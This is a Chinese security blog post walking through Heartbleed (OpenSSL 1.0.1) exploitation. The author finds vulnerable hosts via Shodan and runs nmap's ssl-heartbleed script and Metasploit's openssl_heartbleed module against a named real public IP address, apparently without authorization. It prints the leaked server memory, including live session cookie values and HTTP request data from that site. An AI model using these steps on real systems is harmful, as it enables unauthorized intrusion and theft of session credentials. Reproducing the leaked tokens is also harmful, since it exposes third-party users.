freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

openssl1.0.1滴血漏洞复现
2021-01-06 22:00:31
首先用shadan进行搜索主机
1609941415_5ff5c1a7b37b05e596845.png!small
搜索格式为
openssl 1.0.1a
然后随便找一个请求为200的主机进行漏扫
一、使用专门的工具进行扫描
1609941443_5ff5c1c3ce30b6cfc5a60.png!small
发现这个主机没有可以利用的
我们需要再换一个
149.202.69.214

发现可以有一个可以利用的
1609941455_5ff5c1cfd1f7ea0b646e9.png!small
二、使用nmap工具进行扫描
nmap -sV -p 443 149.202.69.214 --script=ssl-heartbleed.nse
1609941470_5ff5c1de2c5ec6d457fc6.png!small
发现下面给爆出了漏洞编号
漏洞发现完成之后,我们就该利用了
打开我们的msf
然后搜索关于xinzang滴血的模块
search heartbleed
1609941479_5ff5c1e78c8e0a632c7c8.png!small
我们选择第一个进入
use auxiliary/scanner/ssl/openssl_heartbleed
1609941496_5ff5c1f820595c894a1cb.png!small
再查看一下需要设置的模块
1609941501_5ff5c1fdb688e27c6638b.png!small
set rhosts 443 149.202.69.214 port 他给出了,不再设置 set VERBOSE true
run一下,发现获取很多敏感信息
1609941528_5ff5c2185aace2a408dee.png!small
......_.;.......E....xZ813on.......!....f.....".!.9.8.........5.............................3.2.....E.D...../...A.......................................9.:.;.<.=.>.?.@.A.B.C.D.E.F.g.h.i.j.k.l.m..................................................................................................................................................................................................... .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>.?.@.A.B.C.D.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].^._.`.a.b.c.d.e.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z.{.|.}.~.....................................................................................................I...........4.2...................................................#.......j.i.g...P.}.6.Q.P.M.I.E.A.>.9.3.2.0.+...........................N=BiOh3qKRuCQh7K45G9Tq; EXP=-1%40%21%400%40%21%40....3....O."^.j....z.....40%21%400%40%21%40.......}..&I..Z?' j.22%2C%22valid%22%3A1%7D%7D; SESSION=BiOh3qKRuCQh7K45G9Tq; EXP=-1%40%21%400%40%21%40....].`<.g....$_...'..................................................................................................................................... repeated 2613 times .....................................................................................................................................8...8........`..................................................................................................................................... repeated 12195 times .....................................................................................................................................@..................................................................................................................................... repeated 16122 times .....................................................................................................................................@..................................................................................................................................... repeated 1087 times .....................................................................................................................................pN..............GET /img4web///EXP_000273//IMG_006344_01R.jpg HTTP/1.1..Host: 149.202.69.214..Connection: keep-alive..User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36..Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8..Sec-Fetch-Site: same-origin..Sec-Fetch-Mode: no-cors..Sec-Fetch-Dest: image..Referer: https://149.202.69.214/sis4web/home3.php..Accept-Encoding: gzip, deflate, br..Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7....eW.R...%...|...Fr%22%3A1%2C%22idExp%22%3A255%2C%22mode%22%3A1%2C%22naming%22%3A%220%22%2C%22scale%22%3A0%2C%22type%22%3A3%2C%22base%22%3A%22%22%2C%22src%22%3A%22%22%2C%22eltSrc%22%3A%22%22%2C%22images%22%3A%22%22%2C%22min16%22%3A%220%22%2C%22max16%22%3A%220%22%2C%22valid%22%3A1%7D%7D; SESSION=BiOh3qKRuCQh7K45G9Tq; EXP=-1%40%21%400%40%21%40......Y..7J/z/..H.. N29.>.#m..R..$..<G..}....g...40....D)...}.!.....e..; SESSION=BiOh3qKRuCQh7K45G9Tq; EXP=-1%40%21%400%40%21%40.....,.W...16..g.)..................................................................................................................................... repeated 5365 times .....................................................................................................................................K...........8...8.... ..................................................................................................................................... repeated 8103 times .....................................................................................................................................@..................................................................................................................................... repeated 16103 times ..............................................................................................................
# 漏洞复现
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者